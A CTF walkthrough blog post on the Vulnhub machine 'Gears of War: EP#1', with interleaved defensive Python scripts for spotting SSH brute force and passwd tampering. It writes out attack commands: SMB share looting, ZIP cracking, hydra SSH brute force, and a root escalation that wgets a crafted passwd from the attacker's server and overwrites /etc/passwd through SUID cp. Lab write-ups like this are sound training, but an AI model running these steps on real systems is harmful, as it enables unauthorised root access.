Gears of War: EP#1 walkthrough vulnhub


Hi guys, welcome back to my blog. Today we solve another Vulnhub CTF, Gears of War: EP#1. This VM was created by eDu809 and is hosted on Vulnhub, where you can download it.

Description

It's a CTF machine that deals with the history of Gears of War, where we must try to escape from prison and obtain root privileges. It has some rabbit holes, so you have to try to connect the tracks to get access.

Network Scanning

Our first step is to find the IP address of the target machine:

netdiscover

Next, check for open ports and running services with nmap:

nmap -A 192.168.1.6

Enumeration

Opening the target IP address in the browser shows a gaming image and a "Join the war!" button in the header, but port 80 does not offer anything useful.

http://192.168.1.6

Since port 80 leads nowhere, the next step is SMB enumeration. smbclient with the -L option lists every share the server exposes:

smbclient -L //192.168.1.6

The share list reveals a LOCUS_LAN$ share, and an anonymous login to it succeeds:

smbclient //192.168.1.6/LOCUS_LAN$

Inside we find an SOS.txt file and an msg_horda.zip file. Let's download both to our local machine with the get command:

get msg_horda.zip

get SOS.txt

Running unzip shows that the archive is password protected:

unzip msg_horda.zip

Reading SOS.txt gives a hint about the characters that make up the ZIP password: [@%%,]

cat SOS.txt

Using those hint characters as a crunch pattern, generate a wordlist of four-character candidates:

crunch 4 4 -t @%%, > list.txt

With the wordlist generated, fcrackzip is used to crack the ZIP password:

fcrackzip -D -u -p list.txt msg_horda.zip
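To see why the hint makes the archive so easy to crack, here is an added example (my own code, not part of the original post or of crunch) that expands a crunch-style pattern and counts the candidates it produces. The placeholder classes follow crunch's documented -t semantics (@ lowercase, , uppercase, % digit, ^ symbol); the symbol set is an approximation I assumed, and the function also accepts literal characters in the mask, which the post's pattern does not use.

```python
import itertools
import string

# Placeholder classes as documented for crunch -t. The "^" symbol list is an
# approximation assumed here, not crunch's exact table.
MASK_CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/",
}


def _pool(ch):
    """Character pool for one mask position; unknown chars are literals."""
    return MASK_CLASSES.get(ch, ch)


def mask_keyspace(mask):
    """Number of distinct candidates the mask can produce."""
    total = 1
    for ch in mask:
        total *= len(_pool(ch))
    return total


def expand_mask(mask):
    """Yield every candidate the mask describes, in crunch's lexical order."""
    pools = [_pool(ch) for ch in mask]
    for combo in itertools.product(*pools):
        yield "".join(combo)


def fits_mask(candidate, mask):
    """True if candidate has the mask's length and each char is in its class."""
    if len(candidate) != len(mask):
        return False
    return all(c in _pool(m) for c, m in zip(candidate, mask))


if __name__ == "__main__":
    hint = "@%%,"  # the pattern leaked by SOS.txt
    print(f"{hint!r} leaves only {mask_keyspace(hint):,} candidates")
    print("first few:", list(itertools.islice(expand_mask(hint), 5)))
```

A 67,600-entry keyspace is exhausted in seconds by any offline ZIP cracker, which is the real lesson of SOS.txt: a password hint that fixes the length and the character class of every position is as good as the password itself.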

fcrackzip reports a possible password. Unzipping the archive with it reveals a key.txt file:

unzip msg_horda.zip
cat key.txt

key.txt contains another credential, 3_d4y. Since no username comes with it, I use hydra to brute-force the SSH username with that password:

hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.1.6

After about five minutes the attack succeeds and reveals the SSH username. I log in with these credentials:

  • username: marcus
  • password: 3_d4y
ssh marcus@192.168.1.6

id
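The hydra run above leaves a very recognisable trace on the target: a burst of failed SSH logins from one source, each with a different username, followed by a success. As an added example (my own code, not from the post), the following script parses sshd lines in the standard auth.log format and raises an alert on exactly that pattern. The log lines are constructed sample data, and the threshold of five failures is an assumed tuning value.

```python
import re
from collections import defaultdict

# Standard OpenSSH auth.log phrasing for password authentication results.
SSHD_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_sshd(lines):
    """Return (result, user, source_ip) tuples for password-auth events."""
    events = []
    for line in lines:
        m = SSHD_RE.search(line)
        if m:
            events.append((m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(lines, threshold=5):
    """Per-source statistics plus alerts for failure bursts and post-burst success."""
    stats = defaultdict(lambda: {"failed": 0, "users": set(), "accepted": []})
    alerts = []
    for result, user, ip in parse_sshd(lines):
        s = stats[ip]
        if result == "Failed":
            s["failed"] += 1
            s["users"].add(user)  # many distinct names = username enumeration
            if s["failed"] == threshold:
                alerts.append(
                    f"{ip}: {threshold} failed logins across {len(s['users'])} usernames"
                )
        else:
            s["accepted"].append(user)
            if s["failed"] >= threshold:
                alerts.append(
                    f"{ip}: successful login as {user} after {s['failed']} failures"
                )
    return dict(stats), alerts


# Constructed sample log: one noisy source spraying usernames, one unrelated failure.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 locus sshd[1201]: Failed password for invalid user admin from 192.168.1.18 port 40210 ssh2
Mar  3 10:15:01 locus sshd[1203]: Failed password for invalid user ubuntu from 192.168.1.18 port 40212 ssh2
Mar  3 10:15:02 locus sshd[1205]: Failed password for invalid user guest from 192.168.1.18 port 40214 ssh2
Mar  3 10:15:02 locus sshd[1207]: Failed password for root from 192.168.1.18 port 40216 ssh2
Mar  3 10:15:03 locus sshd[1209]: Failed password for invalid user dom from 192.168.1.18 port 40218 ssh2
Mar  3 10:15:03 locus sshd[1211]: Failed password for invalid user cole from 192.168.1.18 port 40220 ssh2
Mar  3 10:17:00 locus sshd[1300]: Failed password for bob from 10.0.0.5 port 51000 ssh2
Mar  3 10:20:07 locus sshd[1409]: Accepted password for marcus from 192.168.1.18 port 41900 ssh2
Mar  3 10:20:07 locus sshd[1409]: pam_unix(sshd:session): session opened for user marcus by (uid=0)
""".splitlines()

if __name__ == "__main__":
    stats, alerts = detect_bruteforce(SAMPLE_AUTH_LOG)
    for a in alerts:
        print("ALERT", a)
```

Key-based authentication, or a rate limiter such as fail2ban keyed on the same "Failed password" lines, closes this path entirely; the detector above is the minimum a defender should have so that a five-minute hydra run does not go unnoticed.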

Privilege Escalation

Enumerating the system's directories and files turns up nothing useful, so I check for files with the SUID bit set, which reveals the /bin/cp binary:

find / -type f -perm -u=s 2>/dev/null


Next, generate a password hash for a new user, rahul:

openssl passwd -1 -salt rahul password

I copy the passwd file to the /tmp directory, but I fail to edit it there because this user does not have permission:

cat >> passwd

ls -ls passwd

Instead I copy the passwd file into the SMB share directory and download it to my local system:

smbclient //192.168.1.6/LOCUS_LAN$

get passwd

After appending our new user to the passwd file, I start a local Python web server on port 99 to serve it:

cat >>passwd

python -m SimpleHTTPServer 99

Back on the target, move to the /home/marcus directory and download the file with wget:

cd /home/marcus/ 

wget http://192.168.1.18:99/passwd

The download succeeds. Copying the file into /etc/ with the SUID cp (which runs as root) overwrites the system passwd file, and its last two lines now show that our user rahul was added successfully:

cp passwd /etc/

With the user in the passwd file, I switch from marcus to the new user rahul. The first attempt shows an error, so I copy rahul's password to the clipboard and paste it into the password prompt:

su rahul
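Both halves of this privilege escalation (a SUID cp and a hand-edited /etc/passwd carrying a UID-0 account with an inline MD5-crypt hash) are easy to spot on a host if anyone looks. As an added example (my own code, not from the post), here is a small audit that walks the filesystem for SUID binaries, flags ones that should never be SUID, and checks every /etc/passwd entry for the tell-tale signs of this trick. The risky-binary list and the sample passwd content are constructed; the hash value in it is a placeholder, not the real output of the openssl command above.

```python
import os
import stat

# SUID binaries that hand any local user root-level file access. /bin/cp is the
# one abused in this walkthrough. Assumed list, not exhaustive.
RISKY_SUID_NAMES = {"cp", "mv", "cat", "tee", "dd", "find", "vim", "vi", "nano",
                    "bash", "sh", "dash", "python", "python3", "perl", "less",
                    "more", "tar"}

# Password-field values that mean "hash lives in /etc/shadow" or "account locked".
LOCKED_FIELDS = {"x", "*", "!", "!!", "*LK*"}


def audit_passwd(text):
    """Return (line_no, problem, account) tuples for suspicious /etc/passwd entries."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((n, "malformed entry (expected 7 fields)", line))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if pw == "":
            findings.append((n, "empty password field (login without password)", name))
        elif pw not in LOCKED_FIELDS:
            findings.append((n, "password hash stored in /etc/passwd instead of /etc/shadow", name))
            if pw.startswith("$1$"):
                findings.append((n, "weak MD5-crypt ($1$) hash", name))
        if not uid.isdigit():
            findings.append((n, "non-numeric UID", name))
        elif uid == "0" and name != "root":
            findings.append((n, "non-root account with UID 0", name))
    return findings


def find_suid(root="/"):
    """Walk the filesystem and return regular files that carry the SUID bit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits


def flag_risky_suid(paths):
    """Subset of SUID paths whose basename is a known file-access primitive."""
    return [p for p in paths if os.path.basename(p) in RISKY_SUID_NAMES]


# Constructed sample: a normal file plus the kind of line this walkthrough appends.
# The hash is a placeholder, not the real openssl output.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Fenix:/home/marcus:/bin/bash
rahul:$1$rahul$PLACEHOLDERHASH0000000:0:0::/root:/bin/bash
"""

# Constructed sample SUID list, in the shape the page's find command prints.
SAMPLE_SUID = ["/usr/bin/passwd", "/usr/bin/sudo", "/bin/cp", "/bin/ping"]

if __name__ == "__main__":
    for line_no, problem, account in audit_passwd(SAMPLE_PASSWD):
        print(f"passwd line {line_no}: {problem} [{account}]")
    for path in flag_risky_suid(SAMPLE_SUID):
        print(f"risky SUID binary: {path}")
```

On a live host, replace the sample inputs with `open("/etc/passwd").read()` and `find_suid("/")`; running the audit from a cron job and diffing against a known-good baseline catches both the stray SUID bit and the appended UID-0 line before anyone types su.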

The login succeeds, and rahul has root privileges. I start a bash shell and move to /root:

/bin/bash

cd /root

Finally, read the root flag in root's home directory:

ls -lsa

cat .flag.txt

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.
